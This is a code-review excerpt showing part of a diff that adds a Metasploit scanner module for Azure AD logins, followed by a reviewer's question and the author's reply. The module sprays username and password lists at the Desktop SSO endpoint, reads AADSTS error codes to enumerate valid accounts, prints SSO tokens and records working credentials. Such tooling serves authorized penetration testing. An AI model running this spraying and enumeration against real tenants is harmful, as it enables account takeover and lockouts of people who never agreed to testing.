modules/auxiliary/scanner/http/azure_ad_login.rb

```diff
@@ -0,0 +1,183 @@
+      },
+      'data' => body
+    })
+
+    # Check the XML response for either the SSO Token or the error code
+    xml = res.get_xml_document
+    xml.remove_namespaces!
+
+    if xml.xpath('//DesktopSsoToken')[0]
+      auth_details = xml.xpath('//DesktopSsoToken')[0].text
+    else
+      auth_details = xml.xpath('//internalerror/text')[0].text
+    end
+
+    if xml.xpath('//DesktopSsoToken')[0]
+      print_good("Login #{domain}\\#{username}:#{password} is valid!")
+      print_good("Desktop SSO Token: #{auth_details}")
+      report_login(rhost, rport, domain, username, password)
+    elsif auth_details.start_with?('AADSTS50126') # Valid user but incorrect password
+      print_good("Password #{password} is invalid but #{domain}\\#{username} is valid!")
+      report_login(rhost, rport, domain, username, nil)
+    elsif auth_details.start_with?('AADSTS50056') # User exists without a password in Azure AD
+      print_good("#{domain}\\#{username} is valid but the user does not have a password in Azure AD!")
+      report_login(rhost, rport, domain, username, nil)
+    elsif auth_details.start_with?('AADSTS50076') # User exists, but you need MFA to connect to this resource
+      print_good("Login #{domain}\\#{username}:#{password} is valid, but you need MFA to connect to this resource")
+      report_login(rhost, rport, domain, username, password)
+    elsif auth_details.start_with?('AADSTS50014') # User exists, but the maximum Pass-through Authentication time was exceeded
+      print_good("#{domain}\\#{username} is valid but the maximum pass-through authentication time was exceeded")
+      report_login(rhost, rport, domain, username, nil)
+    elsif auth_details.start_with?('AADSTS50034') # User does not exist
+      print_error("#{domain}\\#{username} is not a valid user")
+    elsif auth_details.start_with?('AADSTS50053') # Account is locked
+      print_error('Account is locked, consider taking time before continuuing to scan!')
+    else # Unknown error code
+      print_error("Received unknown response with error code: #{auth_details}")
+    end
+  end
+
+  def check_logins(rhost, rport, targeturi, domain, usernames, passwords)
+    for username in usernames do
+      for password in passwords do
+        check_login(rhost, rport, targeturi, domain,
+                    username.strip.encode(xml: :text), password.strip.encode(xml: :text))
+      end
+    end
+  end
+
+  def run
+    # Check whether the username is a file or string, stick either in an array
+    if datastore.include? 'USER_FILE'
+      usernames = File.readlines(datastore['USER_FILE'])
+    else
+      usernames = [datastore['USERNAME']]
+    end
+    if datastore.include? 'PASS_FILE'
+      passwords = File.readlines(datastore['PASS_FILE'])
+    else
+      passwords = [datastore['PASSWORD']]
+    end
+
+    check_logins(datastore['RHOST'], datastore['RPORT'], datastore['TARGETURI'],
+                 datastore['DOMAIN'], usernames, passwords)
```

Comment:
I'm not familiar with this vulnerability, but, according to the description, it is possible to enumerate usernames, which suggest that the password is optional. Is it required to set a password when only username enumeration is performed?

Reply:
Yes, you're correct. In the request I have to use a password, but what I can do is default PASSWORD to password and use that if PASS_FILE isn't set. I'll keep the error line in case they unset it though